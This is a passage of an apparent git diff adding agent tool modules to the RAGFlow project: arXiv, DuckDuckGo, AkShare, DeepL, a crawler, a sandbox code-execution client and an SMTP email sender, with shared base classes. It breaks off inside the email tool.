# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import importlib
import inspect
from types import ModuleType
from typing import Dict, Type

_package_path = os.path.dirname(__file__)
__all_classes: Dict[str, Type] = {}


def _import_submodules() -> None:
    for filename in os.listdir(_package_path):  # noqa: F821
        if filename.startswith("__") or not filename.endswith(".py") or filename.startswith("base"):
            continue
        module_name = filename[:-3]

        try:
            module = importlib.import_module(f".{module_name}", package=__name__)
            _extract_classes_from_module(module)  # noqa: F821
        except ImportError as e:
            print(f"Warning: Failed to import module {module_name}: {str(e)}")


def _extract_classes_from_module(module: ModuleType) -> None:
    for name, obj in inspect.getmembers(module):
        if (inspect.isclass(obj) and
                obj.__module__ == module.__name__ and not name.startswith("_")):
            __all_classes[name] = obj
            globals()[name] = obj


_import_submodules()

__all__ = list(__all_classes.keys()) + ["__all_classes"]

del _package_path, _import_submodules, _extract_classes_from_module
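For reference, the registry this module builds at import time can be used as below (a minimal sketch; the names come from the file above, and the listed classes depend on which submodules import successfully):

from agent import tools

print(sorted(tools.__all_classes))        # e.g. ['ArXiv', 'ArXivParam', ...]
arxiv_cls = tools.__all_classes["ArXiv"]  # same object as tools.ArXiv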
56
agent/tools/akshare.py
Normal file
@@ -0,0 +1,56 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import pandas as pd
from agent.component.base import ComponentBase, ComponentParamBase


class AkShareParam(ComponentParamBase):
    """
    Define the AkShare component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 10

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")


class AkShare(ComponentBase, ABC):
    component_name = "AkShare"

    def _run(self, history, **kwargs):
        import akshare as ak
        ans = self.get_input()
        ans = ",".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return AkShare.be_output("")

        try:
            ak_res = []
            stock_news_em_df = ak.stock_news_em(symbol=ans)
            stock_news_em_df = stock_news_em_df.head(self._param.top_n)
            ak_res = [{"content": '<a href="' + i["新闻链接"] + '">' + i["新闻标题"] + '</a>\n 新闻内容: '
                       + i["新闻内容"] + " \n发布时间:" + i["发布时间"] + " \n文章来源: " + i["文章来源"]}
                      for _, i in stock_news_em_df.iterrows()]
        except Exception as e:
            return AkShare.be_output("**ERROR**: " + str(e))

        if not ak_res:
            return AkShare.be_output("")

        return pd.DataFrame(ak_res)
102
agent/tools/arxiv.py
Normal file
@@ -0,0 +1,102 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import time
from abc import ABC
import arxiv
from agent.tools.base import ToolParamBase, ToolMeta, ToolBase
from api.utils.api_utils import timeout


class ArXivParam(ToolParamBase):
    """
    Define the ArXiv component parameters.
    """

    def __init__(self):
        self.meta: ToolMeta = {
            "name": "arxiv_search",
            "description": """arXiv is a free distribution service and an open-access archive for nearly 2.4 million scholarly articles in the fields of physics, mathematics, computer science, quantitative biology, quantitative finance, statistics, electrical engineering and systems science, and economics. Materials on this site are not peer-reviewed by arXiv.""",
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The search keywords to execute with arXiv. The keywords should be the most important words/terms (including synonyms) from the original request.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.top_n = 12
        self.sort_by = 'submittedDate'

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.sort_by, "ArXiv Search Sort_by",
                               ['submittedDate', 'lastUpdatedDate', 'relevance'])

    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }


class ArXiv(ToolBase, ABC):
    component_name = "ArXiv"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", "")
            return ""

        last_e = ""
        for _ in range(self._param.max_retries + 1):
            try:
                sort_choices = {"relevance": arxiv.SortCriterion.Relevance,
                                "lastUpdatedDate": arxiv.SortCriterion.LastUpdatedDate,
                                "submittedDate": arxiv.SortCriterion.SubmittedDate}
                arxiv_client = arxiv.Client()
                search = arxiv.Search(
                    query=kwargs["query"],
                    max_results=self._param.top_n,
                    sort_by=sort_choices[self._param.sort_by]
                )
                self._retrieve_chunks(list(arxiv_client.results(search)),
                                      get_title=lambda r: r.title,
                                      get_url=lambda r: r.pdf_url,
                                      get_content=lambda r: r.summary)
                return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"ArXiv error: {e}")
                time.sleep(self._param.delay_after_error)

        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"ArXiv error: {last_e}"

        assert False, self.output()

    def thoughts(self) -> str:
        return """
Keywords: {}
Looking for the most relevant articles.
""".format(self.get_input().get("query", "-_-!"))
171
agent/tools/base.py
Normal file
@@ -0,0 +1,171 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import re
import time
from copy import deepcopy
from functools import partial
from typing import TypedDict, List, Any
from agent.component.base import ComponentParamBase, ComponentBase
from api.utils import hash_str2int
from rag.llm.chat_model import ToolCallSession
from rag.prompts.prompts import kb_prompt
from rag.utils.mcp_tool_call_conn import MCPToolCallSession


class ToolParameter(TypedDict):
    type: str
    description: str
    displayDescription: str
    enum: List[str]
    required: bool


class ToolMeta(TypedDict):
    name: str
    displayName: str
    description: str
    displayDescription: str
    parameters: dict[str, ToolParameter]


class LLMToolPluginCallSession(ToolCallSession):
    def __init__(self, tools_map: dict[str, object], callback: partial):
        self.tools_map = tools_map
        self.callback = callback

    def tool_call(self, name: str, arguments: dict[str, Any]) -> Any:
        assert name in self.tools_map, f"LLM tool {name} does not exist"
        if isinstance(self.tools_map[name], MCPToolCallSession):
            resp = self.tools_map[name].tool_call(name, arguments, 60)
        else:
            resp = self.tools_map[name].invoke(**arguments)

        self.callback(name, arguments, resp)
        return resp

    def get_tool_obj(self, name):
        return self.tools_map[name]


class ToolParamBase(ComponentParamBase):
    def __init__(self):
        # self.meta: ToolMeta = None
        super().__init__()
        self._init_inputs()
        self._init_attr_by_meta()

    def _init_inputs(self):
        self.inputs = {}
        for k, p in self.meta["parameters"].items():
            self.inputs[k] = deepcopy(p)

    def _init_attr_by_meta(self):
        for k, p in self.meta["parameters"].items():
            if not hasattr(self, k):
                setattr(self, k, p.get("default"))

    def get_meta(self):
        params = {}
        for k, p in self.meta["parameters"].items():
            params[k] = {
                "type": p["type"],
                "description": p["description"]
            }
            if "enum" in p:
                params[k]["enum"] = p["enum"]

        desc = self.meta["description"]
        if hasattr(self, "description"):
            desc = self.description

        function_name = self.meta["name"]
        if hasattr(self, "function_name"):
            function_name = self.function_name

        return {
            "type": "function",
            "function": {
                "name": function_name,
                "description": desc,
                "parameters": {
                    "type": "object",
                    "properties": params,
                    "required": [k for k, p in self.meta["parameters"].items() if p["required"]]
                }
            }
        }


class ToolBase(ComponentBase):
    def __init__(self, canvas, id, param: ComponentParamBase):
        from agent.canvas import Canvas  # Local import to avoid cyclic dependency
        assert isinstance(canvas, Canvas), "canvas must be an instance of Canvas"
        self._canvas = canvas
        self._id = id
        self._param = param
        self._param.check()

    def get_meta(self) -> dict[str, Any]:
        return self._param.get_meta()

    def invoke(self, **kwargs):
        self.set_output("_created_time", time.perf_counter())
        try:
            res = self._invoke(**kwargs)
        except Exception as e:
            self._param.outputs["_ERROR"] = {"value": str(e)}
            logging.exception(e)
            res = str(e)
        self._param.debug_inputs = []

        self.set_output("_elapsed_time", time.perf_counter() - self.output("_created_time"))
        return res

    def _retrieve_chunks(self, res_list: list, get_title, get_url, get_content, get_score=None):
        chunks = []
        aggs = []
        for r in res_list:
            content = get_content(r)
            if not content:
                continue
            content = re.sub(r"!?\[[a-z]+\]\(data:image/png;base64,[ 0-9A-Za-z/_=+-]+\)", "", content)
            content = content[:10000]
            if not content:
                continue
            id = str(hash_str2int(content))
            title = get_title(r)
            url = get_url(r)
            score = get_score(r) if get_score else 1
            chunks.append({
                "chunk_id": id,
                "content": content,
                "doc_id": id,
                "docnm_kwd": title,
                "similarity": score,
                "url": url
            })
            aggs.append({
                "doc_name": title,
                "doc_id": id,
                "count": 1,
                "url": url
            })
        self._canvas.add_refernce(chunks, aggs)
        self.set_output("formalized_content", "\n".join(kb_prompt({"chunks": chunks, "doc_aggs": aggs}, 200000, True)))

    def thoughts(self) -> str:
        return self._canvas.get_component_name(self._id) + " is running..."
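ToolParamBase.get_meta() above assembles an OpenAI-style function-calling schema from self.meta. Run against the arxiv_search meta declared earlier, the result would look roughly like this (a sketch assembled by hand from the code above; description strings abbreviated):

# Approximate shape of ArXivParam().get_meta():
{
    "type": "function",
    "function": {
        "name": "arxiv_search",
        "description": "arXiv is a free distribution service and an open-access archive ...",
        "parameters": {
            "type": "object",
            "properties": {
                "query": {"type": "string", "description": "The search keywords to execute with arXiv. ..."}
            },
            "required": ["query"]
        }
    }
}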
193
agent/tools/code_exec.py
Normal file
@@ -0,0 +1,193 @@
#
# Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import base64
import logging
import os
from abc import ABC
from enum import StrEnum
from typing import Optional
from pydantic import BaseModel, Field, field_validator
from agent.tools.base import ToolParamBase, ToolBase, ToolMeta
from api import settings
from api.utils.api_utils import timeout


class Language(StrEnum):
    PYTHON = "python"
    NODEJS = "nodejs"


class CodeExecutionRequest(BaseModel):
    code_b64: str = Field(..., description="Base64 encoded code string")
    language: str = Field(default=Language.PYTHON.value, description="Programming language")
    arguments: Optional[dict] = Field(default={}, description="Arguments")

    @field_validator("code_b64")
    @classmethod
    def validate_base64(cls, v: str) -> str:
        try:
            base64.b64decode(v, validate=True)
            return v
        except Exception as e:
            raise ValueError(f"Invalid base64 encoding: {str(e)}")

    @field_validator("language", mode="before")
    @classmethod
    def normalize_language(cls, v) -> str:
        if isinstance(v, str):
            low = v.lower()
            if low in ("python", "python3"):
                return "python"
            elif low in ("javascript", "nodejs"):
                return "nodejs"
        raise ValueError(f"Unsupported language: {v}")


class CodeExecParam(ToolParamBase):
    """
    Define the code sandbox component parameters.
    """

    def __init__(self):
        self.meta: ToolMeta = {
            "name": "execute_code",
            "description": """
This tool has a sandbox that can execute code written in 'Python'/'Javascript'. It receives a piece of code and returns a JSON string.
Here's a code example for Python (a `main` function MUST be included):
def main(arg1: str, arg2: str) -> dict:
    return {
        "result": arg1 + arg2,
    }

Here's a code example for Javascript (a `main` function MUST be included and exported):
const axios = require('axios');
async function main(args) {
  try {
    const response = await axios.get('https://github.com/infiniflow/ragflow');
    console.log('Body:', response.data);
  } catch (error) {
    console.error('Error:', error.message);
  }
}
module.exports = { main };
            """,
            "parameters": {
                "lang": {
                    "type": "string",
                    "description": "The programming language of this piece of code.",
                    "enum": ["python", "javascript"],
                    "required": True,
                },
                "script": {
                    "type": "string",
                    "description": "A piece of code in the right format. There MUST be a main function.",
                    "required": True
                }
            }
        }
        super().__init__()
        self.lang = Language.PYTHON.value
        self.script = "def main(arg1: str, arg2: str) -> dict: return {\"result\": arg1 + arg2}"
        self.arguments = {}
        self.outputs = {"result": {"value": "", "type": "string"}}

    def check(self):
        self.check_valid_value(self.lang, "Support languages", ["python", "python3", "nodejs", "javascript"])
        self.check_empty(self.script, "Script")

    def get_input_form(self) -> dict[str, dict]:
        res = {}
        for k, v in self.arguments.items():
            res[k] = {
                "type": "line",
                "name": k
            }
        return res


class CodeExec(ToolBase, ABC):
    component_name = "CodeExec"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 10*60))
    def _invoke(self, **kwargs):
        lang = kwargs.get("lang", self._param.lang)
        script = kwargs.get("script", self._param.script)
        arguments = {}
        for k, v in self._param.arguments.items():
            if kwargs.get(k):
                arguments[k] = kwargs[k]
                continue
            arguments[k] = self._canvas.get_variable_value(v) if v else None

        self._execute_code(
            language=lang,
            code=script,
            arguments=arguments
        )

    def _execute_code(self, language: str, code: str, arguments: dict):
        import requests

        try:
            code_b64 = self._encode_code(code)
            code_req = CodeExecutionRequest(code_b64=code_b64, language=language, arguments=arguments).model_dump()
        except Exception as e:
            self.set_output("_ERROR", "construct code request error: " + str(e))

        try:
            resp = requests.post(url=f"http://{settings.SANDBOX_HOST}:9385/run", json=code_req, timeout=10)
            logging.info(f"http://{settings.SANDBOX_HOST}:9385/run {code_req} {resp.status_code}")
            if resp.status_code != 200:
                resp.raise_for_status()
            body = resp.json()
            if body:
                stderr = body.get("stderr")
                if stderr:
                    self.set_output("_ERROR", stderr)
                    return
                try:
                    rt = eval(body.get("stdout", ""))
                except Exception:
                    rt = body.get("stdout", "")
                logging.info(f"http://{settings.SANDBOX_HOST}:9385/run -> {rt}")
                if isinstance(rt, tuple):
                    for i, (k, o) in enumerate(self._param.outputs.items()):
                        if k.find("_") == 0:
                            continue
                        o["value"] = rt[i]
                elif isinstance(rt, dict):
                    for i, (k, o) in enumerate(self._param.outputs.items()):
                        if k not in rt or k.find("_") == 0:
                            continue
                        o["value"] = rt[k]
                else:
                    for i, (k, o) in enumerate(self._param.outputs.items()):
                        if k.find("_") == 0:
                            continue
                        o["value"] = rt
            else:
                self.set_output("_ERROR", "There is no response from sandbox")

        except Exception as e:
            self.set_output("_ERROR", "Exception executing code: " + str(e))

        return self.output()

    def _encode_code(self, code: str) -> str:
        return base64.b64encode(code.encode("utf-8")).decode("utf-8")

    def thoughts(self) -> str:
        return "Running a short script to process data."
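The sandbox contract is visible from the model and the call above: POST a CodeExecutionRequest to /run on port 9385 and read stdout/stderr from the JSON body. A standalone sketch of that request follows; the endpoint and field names come from this file, while the localhost host is an assumption for illustration.

import base64
import requests

script = 'def main(arg1: str, arg2: str) -> dict:\n    return {"result": arg1 + arg2}'
payload = {
    "code_b64": base64.b64encode(script.encode("utf-8")).decode("utf-8"),
    "language": "python",
    "arguments": {"arg1": "Hello, ", "arg2": "sandbox"},
}
# Assumes a sandbox reachable at localhost; in RAGFlow the host is settings.SANDBOX_HOST.
resp = requests.post("http://localhost:9385/run", json=payload, timeout=10)
print(resp.json().get("stdout"))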
68
agent/tools/crawler.py
Normal file
@@ -0,0 +1,68 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import asyncio
from crawl4ai import AsyncWebCrawler

from agent.tools.base import ToolParamBase, ToolBase
from api.utils.web_utils import is_valid_url


class CrawlerParam(ToolParamBase):
    """
    Define the Crawler component parameters.
    """

    def __init__(self):
        super().__init__()
        self.proxy = None
        self.extract_type = "markdown"

    def check(self):
        self.check_valid_value(self.extract_type, "Type of content from the crawler", ['html', 'markdown', 'content'])


class Crawler(ToolBase, ABC):
    component_name = "Crawler"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not is_valid_url(ans):
            return Crawler.be_output("URL not valid")
        try:
            result = asyncio.run(self.get_web(ans))

            return Crawler.be_output(result)

        except Exception as e:
            return Crawler.be_output(f"An unexpected error occurred: {str(e)}")

    async def get_web(self, url):
        proxy = self._param.proxy if self._param.proxy else None
        async with AsyncWebCrawler(verbose=True, proxy=proxy) as crawler:
            result = await crawler.arun(
                url=url,
                bypass_cache=True
            )

        if self._param.extract_type == 'html':
            return result.cleaned_html
        elif self._param.extract_type == 'markdown':
            return result.markdown
        elif self._param.extract_type == 'content':
            return result.extracted_content
        return result.markdown
61
agent/tools/deepl.py
Normal file
@@ -0,0 +1,61 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from agent.component.base import ComponentBase, ComponentParamBase
import deepl


class DeepLParam(ComponentParamBase):
    """
    Define the DeepL component parameters.
    """

    def __init__(self):
        super().__init__()
        self.auth_key = "xxx"
        self.parameters = []
        self.source_lang = 'ZH'
        self.target_lang = 'EN-GB'

    def check(self):
        self.check_valid_value(self.source_lang, "Source language",
                               ['AR', 'BG', 'CS', 'DA', 'DE', 'EL', 'EN', 'ES', 'ET', 'FI', 'FR', 'HU', 'ID', 'IT',
                                'JA', 'KO', 'LT', 'LV', 'NB', 'NL', 'PL', 'PT', 'RO', 'RU', 'SK', 'SL', 'SV', 'TR',
                                'UK', 'ZH'])
        self.check_valid_value(self.target_lang, "Target language",
                               ['AR', 'BG', 'CS', 'DA', 'DE', 'EL', 'EN-GB', 'EN-US', 'ES', 'ET', 'FI', 'FR', 'HU',
                                'ID', 'IT', 'JA', 'KO', 'LT', 'LV', 'NB', 'NL', 'PL', 'PT-BR', 'PT-PT', 'RO', 'RU',
                                'SK', 'SL', 'SV', 'TR', 'UK', 'ZH'])


class DeepL(ComponentBase, ABC):
    component_name = "DeepL"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return DeepL.be_output("")

        try:
            translator = deepl.Translator(self._param.auth_key)
            result = translator.translate_text(ans, source_lang=self._param.source_lang,
                                               target_lang=self._param.target_lang)

            return DeepL.be_output(result.text)
        except Exception as e:
            return DeepL.be_output("**Error**:" + str(e))
120
agent/tools/duckduckgo.py
Normal file
@@ -0,0 +1,120 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import time
from abc import ABC
from duckduckgo_search import DDGS
from agent.tools.base import ToolMeta, ToolParamBase, ToolBase
from api.utils.api_utils import timeout


class DuckDuckGoParam(ToolParamBase):
    """
    Define the DuckDuckGo component parameters.
    """

    def __init__(self):
        self.meta: ToolMeta = {
            "name": "duckduckgo_search",
            "description": "DuckDuckGo is a search engine focused on privacy. It offers search capabilities for web pages, images, and provides translation services. DuckDuckGo also features a private AI chat interface, providing users with an AI assistant that prioritizes data protection.",
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The search keywords to execute with DuckDuckGo. The keywords should be the most important words/terms (including synonyms) from the original request.",
                    "default": "{sys.query}",
                    "required": True
                },
                "channel": {
                    "type": "string",
                    "description": "default:general. The category of the search. `news` is useful for retrieving real-time updates, particularly about politics, sports, and major current events covered by mainstream media sources. `general` is for broader, more general-purpose searches that may include a wide range of sources.",
                    "enum": ["general", "news"],
                    "default": "general",
                    "required": False,
                },
            }
        }
        super().__init__()
        self.top_n = 10
        self.channel = "text"

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.channel, "Web Search or News", ["text", "news"])

    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            },
            "channel": {
                "name": "Channel",
                "type": "options",
                "value": "general",
                "options": ["general", "news"]
            }
        }


class DuckDuckGo(ToolBase, ABC):
    component_name = "DuckDuckGo"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", "")
            return ""

        last_e = ""
        for _ in range(self._param.max_retries + 1):
            try:
                # "channel" matches the tool parameter declared in the meta above.
                if kwargs.get("channel", "general") == "general":
                    with DDGS() as ddgs:
                        # {'title': '', 'href': '', 'body': ''}
                        duck_res = ddgs.text(kwargs["query"], max_results=self._param.top_n)
                        self._retrieve_chunks(duck_res,
                                              get_title=lambda r: r["title"],
                                              get_url=lambda r: r.get("href", r.get("url")),
                                              get_content=lambda r: r["body"])
                        self.set_output("json", duck_res)
                        return self.output("formalized_content")
                else:
                    with DDGS() as ddgs:
                        # {'date': '', 'title': '', 'body': '', 'url': '', 'image': '', 'source': ''}
                        duck_res = ddgs.news(kwargs["query"], max_results=self._param.top_n)
                        self._retrieve_chunks(duck_res,
                                              get_title=lambda r: r["title"],
                                              get_url=lambda r: r.get("href", r.get("url")),
                                              get_content=lambda r: r["body"])
                        self.set_output("json", duck_res)
                        return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"DuckDuckGo error: {e}")
                time.sleep(self._param.delay_after_error)

        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"DuckDuckGo error: {last_e}"

        assert False, self.output()

    def thoughts(self) -> str:
        return """
Keywords: {}
Looking for the most relevant articles.
""".format(self.get_input().get("query", "-_-!"))
215
agent/tools/email.py
Normal file
@@ -0,0 +1,215 @@
|
|||||||
|
#
|
||||||
|
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||||
|
#
|
||||||
|
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||||
|
# you may not use this file except in compliance with the License.
|
||||||
|
# You may obtain a copy of the License at
|
||||||
|
#
|
||||||
|
# http://www.apache.org/licenses/LICENSE-2.0
|
||||||
|
#
|
||||||
|
# Unless required by applicable law or agreed to in writing, software
|
||||||
|
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||||
|
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||||
|
# See the License for the specific language governing permissions and
|
||||||
|
# limitations under the License.
|
||||||
|
#
|
||||||
|
import os
|
||||||
|
import time
|
||||||
|
from abc import ABC
|
||||||
|
import json
|
||||||
|
import smtplib
|
||||||
|
import logging
|
||||||
|
from email.mime.text import MIMEText
|
||||||
|
from email.mime.multipart import MIMEMultipart
|
||||||
|
from email.header import Header
|
||||||
|
from email.utils import formataddr
|
||||||
|
|
||||||
|
from agent.tools.base import ToolParamBase, ToolBase, ToolMeta
|
||||||
|
from api.utils.api_utils import timeout
|
||||||
|
|
||||||
|
|
||||||
|
class EmailParam(ToolParamBase):
|
||||||
|
"""
|
||||||
|
Define the Email component parameters.
|
||||||
|
"""
|
||||||
|
def __init__(self):
|
||||||
|
self.meta:ToolMeta = {
|
||||||
|
"name": "email",
|
||||||
|
"description": "The email is a method of electronic communication for sending and receiving information through the Internet. This tool helps users to send emails to one person or to multiple recipients with support for CC, BCC, file attachments, and markdown-to-HTML conversion.",
|
||||||
|
"parameters": {
|
||||||
|
"to_email": {
|
||||||
|
"type": "string",
|
||||||
|
"description": "The target email address.",
|
||||||
|
"default": "{sys.query}",
|
||||||
|
"required": True
|
||||||
|
},
|
||||||
|
"cc_email": {
|
||||||
|
"type": "string",
|
||||||
|
"description": "The other email addresses needs to be send to. Comma splited.",
|
||||||
|
"default": "",
|
||||||
|
"required": False
|
||||||
|
},
|
||||||
|
"content": {
|
||||||
|
"type": "string",
|
||||||
|
"description": "The content of the email.",
|
||||||
|
"default": "",
|
||||||
|
"required": False
|
||||||
|
},
|
||||||
|
"subject": {
|
||||||
|
"type": "string",
|
||||||
|
"description": "The subject/title of the email.",
|
||||||
|
"default": "",
|
||||||
|
"required": False
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
super().__init__()
|
||||||
|
# Fixed configuration parameters
|
||||||
|
self.smtp_server = "" # SMTP server address
|
||||||
|
self.smtp_port = 465 # SMTP port
|
||||||
|
self.email = "" # Sender email
|
||||||
|
self.password = "" # Email authorization code
|
||||||
|
self.sender_name = "" # Sender name
|
||||||
|
|
||||||
|
def check(self):
|
||||||
|
# Check required parameters
|
||||||
|
self.check_empty(self.smtp_server, "SMTP Server")
|
||||||
|
self.check_empty(self.email, "Email")
|
||||||
|
self.check_empty(self.password, "Password")
|
||||||
|
self.check_empty(self.sender_name, "Sender Name")
|
||||||
|
|
||||||
|
def get_input_form(self) -> dict[str, dict]:
|
||||||
|
return {
|
||||||
|
"to_email": {
|
||||||
|
"name": "To ",
|
||||||
|
"type": "line"
|
||||||
|
},
|
||||||
|
"subject": {
|
||||||
|
"name": "Subject",
|
||||||
|
"type": "line",
|
||||||
|
"optional": True
|
||||||
|
},
|
||||||
|
"cc_email": {
|
||||||
|
"name": "CC To",
|
||||||
|
"type": "line",
|
||||||
|
"optional": True
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
class Email(ToolBase, ABC):
|
||||||
|
component_name = "Email"
|
||||||
|
|
||||||
|
@timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 60))
|
||||||
|
def _invoke(self, **kwargs):
|
||||||
|
if not kwargs.get("to_email"):
|
||||||
|
self.set_output("success", False)
|
||||||
|
return ""
|
||||||
|
|
||||||
|
last_e = ""
|
||||||
|
for _ in range(self._param.max_retries+1):
|
||||||
|
try:
|
||||||
|
# Parse JSON string passed from upstream
|
||||||
|
email_data = kwargs
|
||||||
|
|
||||||
|
# Validate required fields
|
||||||
|
if "to_email" not in email_data:
|
||||||
|
return Email.be_output("Missing required field: to_email")
|
||||||
|
|
||||||
|
# Create email object
|
||||||
|
msg = MIMEMultipart('alternative')
|
||||||
|
|
||||||
|
# Properly handle sender name encoding
|
||||||
|
                msg['From'] = formataddr((str(Header(self._param.sender_name, 'utf-8')), self._param.email))
                msg['To'] = email_data["to_email"]
                if email_data.get("cc_email"):
                    msg['Cc'] = email_data["cc_email"]
                msg['Subject'] = Header(email_data.get("subject", "No Subject"), 'utf-8').encode()

                # Use content from email_data or default content
                email_content = email_data.get("content", "No content provided")
                # msg.attach(MIMEText(email_content, 'plain', 'utf-8'))
                msg.attach(MIMEText(email_content, 'html', 'utf-8'))

                # Connect to SMTP server and send
                logging.info(f"Connecting to SMTP server {self._param.smtp_server}:{self._param.smtp_port}")

                context = smtplib.ssl.create_default_context()
                with smtplib.SMTP(self._param.smtp_server, self._param.smtp_port) as server:
                    server.ehlo()
                    server.starttls(context=context)
                    server.ehlo()
                    # Login
                    logging.info(f"Attempting to login with email: {self._param.email}")
                    server.login(self._param.email, self._param.password)

                    # Build the full recipient list
                    recipients = [email_data["to_email"]]
                    if email_data.get("cc_email"):
                        recipients.extend(email_data["cc_email"].split(','))

                    # Send email
                    logging.info(f"Sending email to recipients: {recipients}")
                    try:
                        server.send_message(msg, self._param.email, recipients)
                        success = True
                    except Exception as e:
                        logging.error(f"Error during send_message: {str(e)}")
                        # Fall back to the lower-level sendmail API
                        server.sendmail(self._param.email, recipients, msg.as_string())
                        success = True

                    try:
                        server.quit()
                    except Exception as e:
                        # Ignore errors when closing the connection
                        logging.warning(f"Non-fatal error during connection close: {str(e)}")

                self.set_output("success", success)
                return success

            except json.JSONDecodeError:
                error_msg = "Invalid JSON format in input"
                logging.error(error_msg)
                self.set_output("_ERROR", error_msg)
                self.set_output("success", False)
                return False

            except smtplib.SMTPAuthenticationError:
                error_msg = "SMTP Authentication failed. Please check your email and authorization code."
                logging.error(error_msg)
                self.set_output("_ERROR", error_msg)
                self.set_output("success", False)
                return False

            except smtplib.SMTPConnectError:
                error_msg = f"Failed to connect to SMTP server {self._param.smtp_server}:{self._param.smtp_port}"
                logging.error(error_msg)
                last_e = error_msg
                time.sleep(self._param.delay_after_error)

            except smtplib.SMTPException as e:
                error_msg = f"SMTP error occurred: {str(e)}"
                logging.error(error_msg)
                last_e = error_msg
                time.sleep(self._param.delay_after_error)

            except Exception as e:
                error_msg = f"Unexpected error: {str(e)}"
                logging.error(error_msg)
                self.set_output("_ERROR", error_msg)
                self.set_output("success", False)
                return False

        if last_e:
